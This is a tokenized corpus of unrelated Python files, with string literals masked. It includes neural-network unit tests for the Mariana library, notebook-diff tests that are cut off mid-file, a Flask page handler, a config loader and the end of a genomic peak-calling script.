"<STR_LIT>" % std_v ) <EOL> info ( "<STR_LIT>" ) <EOL> if options . nullmodel : <EOL> ( sum_v , max_v , min_v , mean_v , std_v ) = wtrack . null_model_summary ( sample = options . samplepercent ) <EOL> else : <EOL> ( sum_v , max_v , min_v , mean_v , std_v ) = wtrack . summary ( ) <EOL> info ( "<STR_LIT>" % mean_v ) <EOL> info ( "<STR_LIT>" % std_v ) <EOL> info ( "<STR_LIT>" ) <EOL> scorecutoff = normal_cdf_inv ( options . cutoff , mu = mean_v , sigma2 = std_v , lower = False ) <EOL> info ( "<STR_LIT>" % scorecutoff ) <EOL> info ( "<STR_LIT>" ) <EOL> wpeaks = wtrack . call_peaks ( cutoff = scorecutoff , min_length = options . minlen , max_gap = options . maxgap ) <EOL> info ( "<STR_LIT>" ) <EOL> bfhd . write ( wpeaks . tobed ( ) ) <EOL> bfhd . close ( ) <EOL> info ( "<STR_LIT>" ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> try : <EOL> main ( ) <EOL> except KeyboardInterrupt : <EOL> sys . stderr . write ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:0> ) </s>
<s> hooks = { <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> } <EOL> class register_hook ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , event ) : <EOL> self . event = event <EOL> def __call__ ( self , f ) : <EOL> names = [ '<STR_LIT>' . format ( func . __module__ , func . func_name ) for func in hooks [ self . event ] ] <EOL> if '<STR_LIT>' . format ( f . __module__ , f . func_name ) not in names : <EOL> hooks [ self . event ] . append ( f ) <EOL> return f </s>
<s> """<STR_LIT>""" <EOL> import os <EOL> CONFIG_IDENTIFIER = os . getenv ( "<STR_LIT>" ) <EOL> from flyingcircus . config . base import * <EOL> overrides = __import__ ( <EOL> "<STR_LIT>" + CONFIG_IDENTIFIER , <EOL> globals ( ) , <EOL> locals ( ) , <EOL> [ "<STR_LIT>" ] <EOL> ) <EOL> for attribute in dir ( overrides ) : <EOL> if attribute . isupper ( ) : <EOL> globals ( ) [ attribute ] = getattr ( overrides , attribute ) </s>
<s> import unittest <EOL> import Mariana . layers as ML <EOL> import Mariana . initializations as MI <EOL> import Mariana . costs as MC <EOL> import Mariana . regularizations as MR <EOL> import Mariana . scenari as MS <EOL> import Mariana . activations as MA <EOL> import theano . tensor as tt <EOL> import numpy <EOL> class MLPTests ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . xor_ins = [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:0> , <NUM_LIT:1> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:0> ] , <EOL> [ <NUM_LIT:1> , <NUM_LIT:1> ] <EOL> ] <EOL> self . xor_outs = [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:0> ] <EOL> def tearDown ( self ) : <EOL> pass <EOL> def trainMLP_xor ( self ) : <EOL> ls = MS . GradientDescent ( lr = <NUM_LIT:0.1> ) <EOL> cost = MC . NegativeLogLikelihood ( ) <EOL> i = ML . Input ( <NUM_LIT:2> , '<STR_LIT>' ) <EOL> h = ML . Hidden ( <NUM_LIT:10> , activation = MA . ReLU ( ) , regularizations = [ MR . L1 ( <NUM_LIT:0> ) , MR . L2 ( <NUM_LIT:0> ) ] , name = "<STR_LIT>" ) <EOL> o = ML . SoftmaxClassifier ( <NUM_LIT:2> , learningScenario = ls , costObject = cost , name = "<STR_LIT>" ) <EOL> mlp = i > h > o <EOL> self . xor_ins = numpy . array ( self . xor_ins ) <EOL> self . xor_outs = numpy . array ( self . xor_outs ) <EOL> for i in xrange ( <NUM_LIT:1000> ) : <EOL> mlp . train ( o , inp = self . xor_ins , targets = self . xor_outs ) <EOL> return mlp <EOL> def test_xor ( self ) : <EOL> mlp = self . trainMLP_xor ( ) <EOL> o = mlp . outputs . values ( ) [ <NUM_LIT:0> ] <EOL> pa = mlp . predictionAccuracy ( o , inp = self . xor_ins , targets = self . xor_outs ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( pa , <NUM_LIT:1> ) <EOL> pc = mlp . classificationAccuracy ( o , inp = self . xor_ins , targets = self . xor_outs ) [ <NUM_LIT:0> ] <EOL> self . assertEqual ( pc , <NUM_LIT:1> ) <EOL> self . assertEqual ( mlp . classify ( o , inp = [ self . xor_ins [ <NUM_LIT:0> ] ] ) [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> self . assertEqual ( mlp . classify ( o , inp = [ self . xor_ins [ <NUM_LIT:1> ] ] ) [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( mlp . classify ( o , inp = [ self . xor_ins [ <NUM_LIT:2> ] ] ) [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( mlp . classify ( o , inp = [ self . xor_ins [ <NUM_LIT:3> ] ] ) [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> def test_save_load_pickle ( self ) : <EOL> import cPickle , os <EOL> import Mariana . network as MN <EOL> mlp = self . trainMLP_xor ( ) <EOL> mlp . save ( "<STR_LIT>" ) <EOL> mlp2 = MN . loadModel ( "<STR_LIT>" ) <EOL> o = mlp . outputs . values ( ) [ <NUM_LIT:0> ] <EOL> o2 = mlp2 . outputs . values ( ) [ <NUM_LIT:0> ] <EOL> for i in xrange ( len ( self . xor_ins ) ) : <EOL> v1 = mlp . propagate ( o , inp = [ self . xor_ins [ i ] ] ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> v2 = mlp2 . propagate ( o2 , inp = [ self . xor_ins [ i ] ] ) [ <NUM_LIT:0> ] [ <NUM_LIT:0> ] <EOL> for j in xrange ( len ( v1 ) ) : <EOL> self . assertEqual ( v1 [ j ] , v2 [ j ] ) <EOL> os . remove ( '<STR_LIT>' ) <EOL> def test_ae ( self ) : <EOL> data = [ ] <EOL> for i in xrange ( <NUM_LIT:8> ) : <EOL> zeros = numpy . zeros ( <NUM_LIT:8> ) <EOL> zeros [ i ] = <NUM_LIT:1> <EOL> data . append ( zeros ) <EOL> ls = MS . GradientDescent ( lr = <NUM_LIT:0.1> ) <EOL> cost = MC . MeanSquaredError ( ) <EOL> i = ML . Input ( <NUM_LIT:8> , name = '<STR_LIT>' ) <EOL> h = ML . Hidden ( <NUM_LIT:3> , activation = MA . ReLU ( ) , name = "<STR_LIT>" ) <EOL> o = ML . Regression ( <NUM_LIT:8> , activation = MA . ReLU ( ) , learningScenario = ls , costObject = cost , name = "<STR_LIT>" ) <EOL> ae = i > h > o <EOL> miniBatchSize = <NUM_LIT:2> <EOL> for e in xrange ( <NUM_LIT> ) : <EOL> for i in xrange ( <NUM_LIT:0> , len ( data ) , miniBatchSize ) : <EOL> ae . train ( o , inp = data [ i : i + miniBatchSize ] , targets = data [ i : i + miniBatchSize ] ) <EOL> res = ae . propagate ( o , inp = data ) [ <NUM_LIT:0> ] <EOL> for i in xrange ( len ( res ) ) : <EOL> self . assertEqual ( numpy . argmax ( data [ i ] ) , numpy . argmax ( res [ i ] ) ) <EOL> def test_composite ( self ) : <EOL> ls = MS . GradientDescent ( lr = <NUM_LIT:0.1> ) <EOL> cost = MC . NegativeLogLikelihood ( ) <EOL> inp = ML . Input ( <NUM_LIT:2> , '<STR_LIT>' ) <EOL> h1 = ML . Hidden ( <NUM_LIT:5> , activation = MA . Tanh ( ) , name = "<STR_LIT>" ) <EOL> h2 = ML . Hidden ( <NUM_LIT:5> , activation = MA . Tanh ( ) , name = "<STR_LIT>" ) <EOL> o = ML . SoftmaxClassifier ( <NUM_LIT:2> , learningScenario = ls , costObject = cost , name = "<STR_LIT>" ) <EOL> c = ML . Composite ( name = "<STR_LIT>" ) <EOL> inp > h1 > c <EOL> inp > h2 > c <EOL> mlp = c > o <EOL> self . xor_ins = numpy . array ( self . xor_ins ) <EOL> self . xor_outs = numpy . array ( self . xor_outs ) <EOL> for i in xrange ( <NUM_LIT> ) : <EOL> ii = i % len ( self . xor_ins ) <EOL> mlp . train ( o , inp = [ self . xor_ins [ ii ] ] , targets = [ self . xor_outs [ ii ] ] ) <EOL> self . assertEqual ( mlp . predict ( o , inp = [ self . xor_ins [ <NUM_LIT:0> ] ] ) [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> self . assertEqual ( mlp . predict ( o , inp = [ self . xor_ins [ <NUM_LIT:1> ] ] ) [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( mlp . predict ( o , inp = [ self . xor_ins [ <NUM_LIT:2> ] ] ) [ <NUM_LIT:0> ] , <NUM_LIT:1> ) <EOL> self . assertEqual ( mlp . predict ( o , inp = [ self . xor_ins [ <NUM_LIT:3> ] ] ) [ <NUM_LIT:0> ] , <NUM_LIT:0> ) <EOL> def test_embedding ( self ) : <EOL> """<STR_LIT>""" <EOL> data = [ [ <NUM_LIT:0> ] , [ <NUM_LIT:1> ] , [ <NUM_LIT:2> ] , [ <NUM_LIT:3> ] , [ <NUM_LIT:4> ] , [ <NUM_LIT:5> ] ] <EOL> targets = [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] <EOL> ls = MS . GradientDescent ( lr = <NUM_LIT:0.5> ) <EOL> cost = MC . NegativeLogLikelihood ( ) <EOL> emb = ML . Embedding ( <NUM_LIT:1> , <NUM_LIT:2> , len ( data ) , learningScenario = ls , name = "<STR_LIT>" ) <EOL> o = ML . SoftmaxClassifier ( <NUM_LIT:2> , learningScenario = MS . Fixed ( ) , costObject = cost , name = "<STR_LIT>" ) <EOL> net = emb > o <EOL> miniBatchSize = <NUM_LIT:2> <EOL> for i in xrange ( <NUM_LIT> ) : <EOL> for i in xrange ( <NUM_LIT:0> , len ( data ) , miniBatchSize ) : <EOL> net . train ( o , emb = data [ i : i + miniBatchSize ] , targets = targets [ i : i + miniBatchSize ] ) <EOL> embeddings = emb . getEmbeddings ( ) <EOL> for i in xrange ( <NUM_LIT:0> , len ( data ) / <NUM_LIT:2> ) : <EOL> v = numpy . dot ( embeddings [ i ] , embeddings [ i + len ( data ) / <NUM_LIT:2> ] ) <EOL> self . assertTrue ( v < - <NUM_LIT:1> ) <EOL> def test_conv ( self ) : <EOL> import Mariana . convolution as MCONV <EOL> import theano <EOL> def getModel ( inpSize , filterWidth ) : <EOL> ls = MS . GradientDescent ( lr = <NUM_LIT:0.5> ) <EOL> cost = MC . NegativeLogLikelihood ( ) <EOL> pooler = MCONV . MaxPooling2D ( <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> i = ML . Input ( inpSize , name = '<STR_LIT>' ) <EOL> ichan = MCONV . InputChanneler ( <NUM_LIT:1> , inpSize , name = '<STR_LIT>' ) <EOL> c1 = MCONV . Convolution2D ( <EOL> nbFilters = <NUM_LIT:5> , <EOL> filterHeight = <NUM_LIT:1> , <EOL> filterWidth = filterWidth , <EOL> activation = MA . ReLU ( ) , <EOL> pooler = pooler , <EOL> name = "<STR_LIT>" <EOL> ) <EOL> c2 = MCONV . Convolution2D ( <EOL> nbFilters = <NUM_LIT:10> , <EOL> filterHeight = <NUM_LIT:1> , <EOL> filterWidth = filterWidth , <EOL> activation = MA . ReLU ( ) , <EOL> pooler = pooler , <EOL> name = "<STR_LIT>" <EOL> ) <EOL> f = MCONV . Flatten ( name = "<STR_LIT>" ) <EOL> h = ML . Hidden ( <NUM_LIT:5> , activation = MA . ReLU ( ) , decorators = [ ] , regularizations = [ ] , name = "<STR_LIT>" ) <EOL> o = ML . SoftmaxClassifier ( <NUM_LIT:2> , decorators = [ ] , learningScenario = ls , costObject = cost , name = "<STR_LIT>" , regularizations = [ ] ) <EOL> model = i > ichan > c1 > c2 > f > h > o <EOL> return model <EOL> def makeDataset ( nbExamples , size , patternSize ) : <EOL> data = numpy . random . randn ( nbExamples , size ) . astype ( theano . config . floatX ) <EOL> data = data / numpy . sum ( data ) <EOL> pattern = numpy . ones ( patternSize ) <EOL> targets = [ ] <EOL> for i in xrange ( len ( data ) ) : <EOL> if i % <NUM_LIT:2> == <NUM_LIT:0> : <EOL> start = numpy . random . randint ( <NUM_LIT:0> , size / <NUM_LIT:2> - patternSize ) <EOL> targets . append ( <NUM_LIT:0> ) <EOL> else : <EOL> start = numpy . random . randint ( size / <NUM_LIT:2> , size - patternSize ) <EOL> targets . append ( <NUM_LIT:1> ) <EOL> data [ i ] [ start : start + patternSize ] = pattern <EOL> targets = numpy . asarray ( targets , dtype = theano . config . floatX ) <EOL> trainData , trainTargets = data , targets <EOL> return ( trainData , trainTargets ) <EOL> examples , targets = makeDataset ( <NUM_LIT:1000> , <NUM_LIT> , <NUM_LIT:6> ) <EOL> model = getModel ( <NUM_LIT> , <NUM_LIT:3> ) <EOL> miniBatchSize = <NUM_LIT:32> <EOL> for epoch in xrange ( <NUM_LIT:100> ) : <EOL> for i in xrange ( <NUM_LIT:0> , len ( examples ) , miniBatchSize ) : <EOL> res = model . train ( "<STR_LIT>" , inp = examples [ i : i + miniBatchSize ] , targets = targets [ i : i + miniBatchSize ] ) <EOL> self . assertTrue ( res [ <NUM_LIT:0> ] < <NUM_LIT:0.1> ) <EOL> def test_batch_norm ( self ) : <EOL> import theano , numpy <EOL> def batchnorm ( W , b , data ) : <EOL> return numpy . asarray ( W * ( ( data - numpy . mean ( data ) ) / numpy . std ( data ) ) + b , dtype = theano . config . floatX ) <EOL> data = numpy . random . randn ( <NUM_LIT:1> , <NUM_LIT:100> ) . astype ( theano . config . floatX ) <EOL> inp = ML . Input ( <NUM_LIT:100> , '<STR_LIT>' ) <EOL> bn = ML . BatchNormalization ( ) <EOL> model = inp > bn <EOL> m1 = numpy . mean ( model . propagate ( bn , inp = data ) ) <EOL> m2 = numpy . mean ( batchnorm ( bn . getW ( ) , bn . getb ( ) , data ) ) <EOL> epsilon = <NUM_LIT> <EOL> self . assertTrue ( ( m1 - m2 ) < epsilon ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import Mariana . settings as MSET <EOL> MSET . VERBOSE = False <EOL> unittest . main ( ) </s>
<s> from . import BaseCommand <EOL> from flask import render_template <EOL> class ContactUsCommand ( BaseCommand ) : <EOL> def process ( self , request , filename , db_session ) : <EOL> return render_template ( '<STR_LIT>' ) <EOL> def newInstance ( ) : <EOL> return ContactUsCommand ( ) </s>
<s> from nbdiff . comparable import CellComparator <EOL> from nbdiff . notebook_diff import ( <EOL> cells_diff , <EOL> words_diff , <EOL> lines_diff , <EOL> diff_modified_items , <EOL> ) <EOL> def test_diff_cells0 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } ] <EOL> result = cells_diff ( A , B , check_modified = False ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_cells1 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:k>' ] } ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_cells2 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_cells3 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:y>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:w>' ] } <EOL> ] <EOL> result = cells_diff ( A , B ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:2> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_cells4 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ ] } ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_cells5 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:z>' ] } <EOL> ] <EOL> B = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:k>' ] } <EOL> ] <EOL> result = cells_diff ( A , B , check_modified = True ) <EOL> assert result [ <NUM_LIT:0> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> assert result [ <NUM_LIT:1> ] [ '<STR_LIT:state>' ] == '<STR_LIT>' <EOL> def test_diff_cells6 ( ) : <EOL> A = [ <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT:text>" : [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" <EOL> ] <EOL> } <EOL> ] , <EOL> "<STR_LIT>" : <NUM_LIT> , <EOL> u'<STR_LIT:input>' : [ u'<STR_LIT>' , u'<STR_LIT>' , u'<STR_LIT:\n>' , u'<STR_LIT:m>' ] } , <EOL> { '<STR_LIT>' : "<STR_LIT:code>" , <EOL> '<STR_LIT>' : "<STR_LIT>" , <EOL> "<STR_LIT>" : [ <EOL> { <EOL> "<STR_LIT>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : 